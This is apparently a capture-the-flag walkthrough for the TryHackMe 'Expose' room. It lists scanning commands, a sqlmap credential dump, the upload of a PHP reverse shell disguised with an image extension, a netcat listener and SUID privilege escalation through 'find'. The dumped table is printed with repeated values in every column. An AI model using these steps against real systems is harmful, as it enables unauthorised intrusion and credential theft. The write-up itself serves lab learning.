Expose

Room Link: https://tryhackme.com/room/expose

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/1337 - HTTP

Kali

gobuster dir -u http://$VICTIM:1337 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Kali

sqlmap -r request.txt --dbms=mysql --dump

+--------------------------------------+--------------------------------------+--------------------------------------+--------------------------------------+
| id                                   | email                                | created                              | password                             |
+--------------------------------------+--------------------------------------+--------------------------------------+--------------------------------------+
| 2023-02-21 09:05:46                  | 2023-02-21 09:05:46                  | 2023-02-21 09:05:46                  | 2023-02-21 09:05:46                  |
| hacker@root.thm                      | hacker@root.thm                      | hacker@root.thm                      | hacker@root.thm                      |
| 1                                    | 1                                    | 1                                    | 1                                    |
| VeryDifficultPassword!!#@#@!#!@#1231 | VeryDifficultPassword!!#@#@!#!@#1231 | VeryDifficultPassword!!#@#@!#!@#1231 | VeryDifficultPassword!!#@#@!#!@#1231 |
+--------------------------------------+--------------------------------------+--------------------------------------+--------------------------------------+

There are two URLs here, the second one needs a username which we don't have so we'll start with the first one.

+----+------------------------------+-----------------------------------------------------+
| id | url                          | password                                            |
+----+------------------------------+-----------------------------------------------------+
| 1  | /file1010111/index.php       | 69c66901194a6486176e81f5945b8929 (easytohack)       |
| 3  | /upload-cv00101011/index.php | // ONLY ACCESSIBLE THROUGH USERNAME STARTING WITH Z |
+----+------------------------------+-----------------------------------------------------+

Brower - /file1010111/index.php

Username: hacker@root.thm
Password: VeryDifficultPassword!!#@#@!#!@#1231

Browser

Password: easytohack

Browser - /upload-cv00101011/index.php

Password: zeamkish

Kali

git clone https://github.com/pentestmonkey/php-reverse-shell.git
cd php-reverse-shell/
cp php-reverse-shell.php php-reverse-shell.php#.png
nc -lvnp 1337 

Get autocomplete

python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

Kali

ssh zeamkish@$VICTIM
Password: easytohack@123

Privilege Escalation

Victim

find / -perm -4000 2>/dev/null
find . -exec /bin/sh -p \; -quit